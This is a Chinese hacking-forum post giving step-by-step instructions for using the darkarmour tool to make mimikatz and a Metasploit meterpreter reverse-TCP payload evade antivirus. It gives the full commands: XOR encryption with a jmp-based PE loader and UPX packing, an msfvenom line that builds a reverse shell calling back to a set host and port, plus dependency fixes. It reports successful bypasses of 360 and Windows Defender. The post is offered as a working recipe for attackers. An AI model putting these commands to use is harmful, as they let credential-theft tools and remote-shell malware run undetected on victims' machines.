[工具使用] 利用darkarmour实现mimikatz和MSF的免杀

1347 2
HK.JH 2022-2-13 00:04:58 来自手机 | 显示全部楼层 |阅读模式
0x1 mimikatz免杀

python3 darkarmour.py -f /root/mimikatz.exe -e xor -j -k sanker -l 20 -u -o /root/bypass_mimikatz.exe


k参数:用于加密的密钥key,如果不设置则默认随机生成
j参数:使用基于jmp的PE加载器
l参数:加密级别
u参数:用upx打包可执行文件

这里加密字节的过程比较久,尝试运行bypass_mimikatz.exe

运行成功,看看免杀效果如何

Bypass 360 success!

Bypass Windows Defender success!

V站评分10/66

0x2 MSF免杀


先生成可执行文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 -f exe -o msf.exe

此次的加密等级设置为10

上线成功,看看免杀效果如何


Bypass 360 success!


Bypass Windows Defender success!

V站评分22/66(分数不太可观,可能和我设置的加密等级有关)


加密后的mimikatz.exe居然10.6MB。源文件才1.29MB,我猜测这应该是我设置的加密等级太高,图中可以看到我加密等级为500,项目给出的示例也仅仅是5而已。同时,我猜测加密等级会影响免杀效果,由于加密花费时间较长,我这里就没有一一进行测试

记录一些使用过程中遇到的问题:



排坑1:报错“sh: 1: x86_64-w64-mingw32-gcc: not foundded.exe...”


解决方法:

apt-get install mingw-w64
项目所需要的依赖环境:

apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode

注意:本人试过用Windows 10和Ubuntu系统去使用darkarmour工具,都混淆shellcode失败,原因未知。如果同样有小伙伴在使用这款工具时遇到这样的问题,不妨换成Kali系统。


排坑2:使用msfvenom生成MSF马时,必须用以下命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 -f exe -o msf.exe
注意:payload一定得是windows/x64/meterpreter/reverse_tcp

(别问为什么,我也不清楚,我一开始上线不成功,最后排查到居然是payload的问题,想不明白为什么,这里浪费好些时间图片)

源项目地址:

https://github.com/bats3c/darkarmour
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行